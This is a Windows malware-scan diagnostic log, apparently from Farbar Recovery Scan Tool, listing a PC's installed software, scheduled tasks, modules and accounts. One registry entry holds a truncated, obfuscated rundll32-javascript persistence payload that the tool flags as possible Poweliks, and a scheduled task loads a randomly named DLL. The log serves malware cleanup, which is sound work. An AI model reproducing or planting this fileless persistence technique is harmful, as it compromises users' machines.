Jewel Quest Mysteries Trail of the Midnight Heart (HKLM-x32\...\{305706E3-A7FC-466F-8594-AD4522951418}) (Version: 1.00.0000 - Valusoft)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.57.2 - JMicron Technology Corp.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Label@Once 1.0 (x32 Version: 1.0 - Corel) Hidden
Letters from Nowhere 2 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
MLE (x32 Version: 1.0.0.60 - Corel Corporation) Hidden
MotoCast (HKLM-x32\...\{5401CEE8-3C2D-4835-A802-213306537FF4}) (Version: 2.0.31 - Motorola Mobility)
Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.4.5 - Motorola Mobility)
Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden
MOTOROLA MEDIA LINK (x32 Version: 1.9.0002.0 - Motorola) Hidden
Motorola Mobile Drivers Installation 6.3.0 (HKLM\...\{759E6A2F-1F01-45EF-A0C4-22F1B56CB975}) (Version: 6.3.0 - Motorola Mobility LLC)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Mystery P.I. - Stolen in San Francisco (HKLM-x32\...\Mystery P.I. - Stolen in San Francisco) (Version:  - PopCap Games)
Mystery P.I. - The New York Fortune (HKLM-x32\...\Mystery P.I. - The New York Fortune) (Version:  - PopCap Games)
National Geographic Collector's Pack (HKLM-x32\...\{3BF564F2-7434-454A-88DD-9A6114851751}) (Version: 1.00.0000 - Valusoft)
Norton 360 (HKLM-x32\...\N360) (Version: 21.6.0.32 - Symantec Corporation)
Norton PC Checkup (HKLM-x32\...\Norton PC Checkup_is1) (Version: 3.0.2.90.0 - NortonLive Services)
NVIDIA 3D Vision Controller Driver (x32 Version: 266.84 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 296.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 296.10 - NVIDIA Corporation)
NVIDIA Control Panel 296.10 (Version: 296.10 - NVIDIA Corporation) Hidden
NVIDIA Graphics Driver 296.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.10 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.62.312 - NVIDIA Corporation) Hidden
NVIDIA Optimus 1.7.11 (Version: 1.7.11 - NVIDIA Corporation) Hidden
NVIDIA PhysX (x32 Version: 9.12.0213 - NVIDIA Corporation) Hidden
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
NVIDIA Update Components (Version: 1.7.11 - NVIDIA Corporation) Hidden
PCmover Professional (HKLM-x32\...\{71AA2137-C3F3-45C6-A408-81697FE5A3B8}) (Version: 6.00.620.0 - Laplink Software, Inc.)
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
PureHD (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.38.113.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6305 - Realtek Semiconductor Corp.)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.34.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.34.0 - Renesas Electronics Corporation) Hidden
RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden
Samsung CLP-310 Series (HKLM-x32\...\Samsung CLP-310 Series) (Version:  - Samsung Electronics CO.,LTD)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Setup (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Share (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Share64 (Version: 1.5.10.332 - Corel Corporation) Hidden
Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.2.11.1 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.98 - WildTangent) Hidden
TomTom HOME (HKLM-x32\...\{26CE484D-2E8E-40D5-B251-158133114C69}) (Version: 2.9.0 - TomTom)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
Toshiba App Place (HKLM-x32\...\{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}) (Version: 1.0.6.3 - Toshiba)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.2 - TOSHIBA)
TOSHIBA Assist (HKLM-x32\...\{C2A276E3-154E-44DC-AAF1-FFDD7FD30E35}) (Version: 4.2.3.0 - TOSHIBA CORPORATION)
TOSHIBA Blu-ray Disc Player (HKLM\...\{27C3DB42-A9C1-4B44-A164-93849D160D12}) (Version: 1.0.3.188  - Toshiba Corporation)
Toshiba Book Place (HKLM-x32\...\{C31337DE-0CDC-45A9-9A32-F099AC78D557}) (Version: 3.0.9490 - K-NFB Reading Technology, Inc.)
TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{1C8C049A-145F-4A6E-8290-B5C245EBE39D}) (Version: 1.6.11.64 - TOSHIBA Corporation)
TOSHIBA Bulletin Board (Version: 1.6.11.64 - TOSHIBA Corporation) Hidden
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.11 for x64 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\{C2F94B5E-201A-4754-8F2F-4395E1D90DA3}) (Version: 1.3.5.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.17.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (Version: 3.1.17.64 - TOSHIBA Corporation) Hidden
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.12C - TOSHIBA CORPORATION)
TOSHIBA Flash Cards Support Utility (x32 Version: 1.63.0.12C - TOSHIBA CORPORATION) Hidden
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.1.37C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (x32 Version: 1.63.1.37C - TOSHIBA CORPORATION) Hidden
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.2.15 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.9 - TOSHIBA Corporation)
Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.13.11 - Symantec Corporation)
TOSHIBA Media Controller (HKLM-x32\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.87.4 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.8.0 - TOSHIBA CORPORATION)
Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 2.0.0.31 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.7.9.64 - TOSHIBA Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.4 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.5.5109a - TOSHIBA CORPORATION)
TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}) (Version: 1.7.21.64 - TOSHIBA Corporation)
TOSHIBA ReelTime (Version: 1.7.21.64 - TOSHIBA Corporation) Hidden
TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.1.2001 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.13 - TOSHIBA)
TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.2.8 - TOSHIBA Corporation)
TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.51.2C - TOSHIBA CORPORATION)
TOSHIBA Supervisor Password (x32 Version: 1.63.51.2C - TOSHIBA CORPORATION) Hidden
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.6.1.64 - TOSHIBA Corporation)
TOSHIBA Value Added Package (Version: 1.6.1.64 - TOSHIBA Corporation) Hidden
TOSHIBA Value Added Package (x32 Version: 1.6.1.64 - TOSHIBA Corporation) Hidden
TOSHIBA Web Camera Application (HKLM-x32\...\InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}) (Version: 2.0.3.3 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (x32 Version: 2.0.3.3 - TOSHIBA Corporation) Hidden
TOSHIBA Wireless Display Monitor (HKLM-x32\...\{617773AE-ADBA-4479-BB04-65FE7758B35C}) (Version: 1.0.1 - TOSHIBA CORPORATION)
TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.9 - TOSHIBA)
TurboTax 2009 (HKLM-x32\...\TurboTax 2009) (Version:  - Intuit, Inc)
TurboTax 2009 WinPerFedFormset (x32 Version: 009.000.2881 - Intuit Inc.) Hidden
TurboTax 2009 WinPerReleaseEngine (x32 Version: 009.000.0328 - Intuit Inc.) Hidden
TurboTax 2009 WinPerTaxSupport (x32 Version: 009.000.0245 - Intuit Inc.) Hidden
TurboTax 2009 wmoiper (x32 Version: 009.000.0809 - Intuit Inc.) Hidden
TurboTax 2009 wrapper (x32 Version: 009.000.0145 - Intuit Inc.) Hidden
TurboTax 2010 (HKLM-x32\...\TurboTax 2010) (Version:  - Intuit, Inc)
TurboTax 2010 WinPerFedFormset (x32 Version: 010.000.5821 - Intuit Inc.) Hidden
TurboTax 2010 WinPerReleaseEngine (x32 Version: 010.000.0501 - Intuit Inc.) Hidden
TurboTax 2010 WinPerTaxSupport (x32 Version: 010.000.0222 - Intuit Inc.) Hidden
TurboTax 2010 wmoiper (x32 Version: 010.000.1316 - Intuit Inc.) Hidden
TurboTax 2010 wrapper (x32 Version: 010.000.0157 - Intuit Inc.) Hidden
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2011 WinPerFedFormset (x32 Version: 011.000.2999 - Intuit Inc.) Hidden
TurboTax 2011 WinPerReleaseEngine (x32 Version: 011.000.0474 - Intuit Inc.) Hidden
TurboTax 2011 WinPerTaxSupport (x32 Version: 011.000.0214 - Intuit Inc.) Hidden
TurboTax 2011 wmoiper (x32 Version: 011.000.1600 - Intuit Inc.) Hidden
TurboTax 2011 wrapper (x32 Version: 011.000.0121 - Intuit Inc.) Hidden
TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)
TurboTax 2012 WinPerFedFormset (x32 Version: 012.000.2114 - Intuit Inc.) Hidden
TurboTax 2012 WinPerReleaseEngine (x32 Version: 012.000.0451 - Intuit Inc.) Hidden
TurboTax 2012 WinPerTaxSupport (x32 Version: 012.000.0179 - Intuit Inc.) Hidden
TurboTax 2012 wmoiper (x32 Version: 012.000.1393 - Intuit Inc.) Hidden
TurboTax 2012 wrapper (x32 Version: 012.000.0127 - Intuit Inc.) Hidden
TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)
TurboTax 2013 WinPerFedFormset (x32 Version: 013.000.1986 - Intuit Inc.) Hidden
TurboTax 2013 WinPerReleaseEngine (x32 Version: 013.000.0492 - Intuit Inc.) Hidden
TurboTax 2013 WinPerTaxSupport (x32 Version: 013.000.0168 - Intuit Inc.) Hidden
TurboTax 2013 wmoiper (x32 Version: 013.000.1224 - Intuit Inc.) Hidden
TurboTax 2013 wrapper (x32 Version: 013.000.0135 - Intuit Inc.) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Utility Common Driver (x32 Version: 1.0.52.3C - TOSHIBA) Hidden
Vacation Quest - Australia (HKLM-x32\...\Vacation Quest - Australia) (Version:  - PopCap Games)
Vacation Quest - The Hawaiian Islands (HKLM-x32\...\Vacation Quest - The Hawaiian Islands) (Version:  - PopCap Games)
VIO (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.2.5 - WildTangent)
WildTangent Games App (Toshiba Games) (x32 Version: 4.0.5.31 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-616022151-183045692-1389677156-1014_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-616022151-183045692-1389677156-1014_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\actxprxy.dll (Microsoft Corporation)

==================== Restore Points  =========================

21-10-2014 11:30:56 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D47314F-7D28-4291-B2F7-26349C2DBD62} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-25] (Google Inc.)
Task: {0E00A6F4-6AF8-4891-833C-F7D740218198} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {1C7291B2-B00F-4A00-B58D-EB02BDCD372B} - System32\Tasks\Motorola Device Manager Engine => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()
Task: {26EB7565-2E78-46CB-A71F-7BFDDF920FAA} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {30C6312B-D20D-4B19-80F3-88338114D4D7} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()
Task: {5C77D2B6-0EE7-4DAF-9261-28786B2B6AF0} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-11] (Google Inc.)
Task: {83679F5F-14B5-40E7-96FE-86010A8B8670} - System32\Tasks\MotoCast Update => C:\Program Files (x86)\Motorola Mobility\MotoCast\LiveUpdate\MotoCastUpdate.exe [2012-07-24] ()
Task: {8DF79F42-F157-4588-AA4B-F4A9FE39D589} - System32\Tasks\{E61DD5E1-BD52-2A9D-750F-258FE7FE9D61} => C:\windows\system32\rjlqdrd.dll/s "C:\windows\system32\rjlqdrd.dll"
Task: {8F1BD512-6362-4B0C-B24C-F0DAA617D245} - System32\Tasks\IHSelfDeleteTASK => CMD
Task: {9249EE0A-F432-4A6E-B2EB-7B3E6500E5A2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-11] (Google Inc.)
Task: {95F388A7-2F0E-4B5E-897A-7D1D88F0BE4F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-25] (Google Inc.)
Task: {95F41986-FC3B-460D-830A-36DEF2786CCC} - System32\Tasks\TOSHIBA Wireless Display Monitor => C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe [2010-12-25] (TOSHIBA CORPORATION)
Task: {9CE64197-9726-4EE4-A2AB-06FB1895174A} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()
Task: {A09ED212-812F-4E47-B984-C677C9EF3865} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {B0B25AB5-F1A7-4FE4-8248-8DA7BE55EED7} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {C0249251-0255-46EB-8265-2D06148CE0D5} - System32\Tasks\IHUninstallTrackingTASK => CMD
Task: {F703BE38-C7D6-4051-BF74-D2ED7683E82B} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-05-31 19:32 - 2011-05-31 19:32 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2008-09-08 10:19 - 2008-09-08 10:19 - 00022016 _____ () C:\windows\System32\cl31cl6.dll
2011-03-11 16:14 - 2011-03-11 16:14 - 00030064 _____ () c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
2011-06-27 11:16 - 2011-06-27 11:16 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2010-11-18 19:18 - 2010-11-18 19:18 - 11190784 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2010-11-30 12:37 - 2010-11-30 12:37 - 00048504 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2010-12-15 17:19 - 2010-12-15 17:19 - 00124320 _____ () C:\Program Files\TOSHIBA\TECO\MUIHelp.dll
2011-05-31 19:32 - 2011-05-31 19:32 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\LIBEAY32.dll
2011-06-09 23:09 - 2011-06-09 23:09 - 00079784 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2009-12-09 16:01 - 2009-12-09 16:01 - 00606208 _____ () C:\Windows\Samsung\PanelMgr\SSMMgr.exe
2012-04-16 20:15 - 2007-08-13 03:31 - 00327168 _____ () C:\Windows\Samsung\PanelMgr\caller64.exe
2011-02-22 21:22 - 2011-02-22 21:22 - 00429432 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\TcrdKBB.exe
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-09-07 21:35 - 2012-09-07 21:35 - 00128960 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\liveupdatetactics.dll
2012-09-07 21:35 - 2012-09-07 21:35 - 00024496 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\DbAccess.dll
2012-09-07 21:37 - 2012-09-07 21:37 - 00466256 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\sqlite3.dll
2012-09-07 21:36 - 2012-09-07 21:36 - 00045992 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\NAdvLog.dll
2012-09-07 21:36 - 2012-09-07 21:36 - 00034752 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\NFileCacheDBAccess.dll
2013-10-31 10:05 - 2013-10-31 10:05 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll
2012-04-01 22:03 - 2012-04-01 22:03 - 00854016 _____ () C:\windows\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll
2012-04-02 20:32 - 2012-04-02 20:32 - 00471040 _____ () C:\windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.104.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll
2012-04-01 22:03 - 2012-04-01 22:03 - 00476520 _____ () C:\windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.136.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime

========================= Accounts: ==========================

ADH (S-1-5-21-616022151-183045692-1389677156-1014 - Administrator - Enabled) => C:\Users\ADH.Heathman-PC
Administrator (S-1-5-21-616022151-183045692-1389677156-500 - Administrator - Disabled)
Guest (S-1-5-21-616022151-183045692-1389677156-501 - Limited - Disabled)
Heathman (S-1-5-21-616022151-183045692-1389677156-1002 - Administrator - Enabled) => C:\Users\Heathman
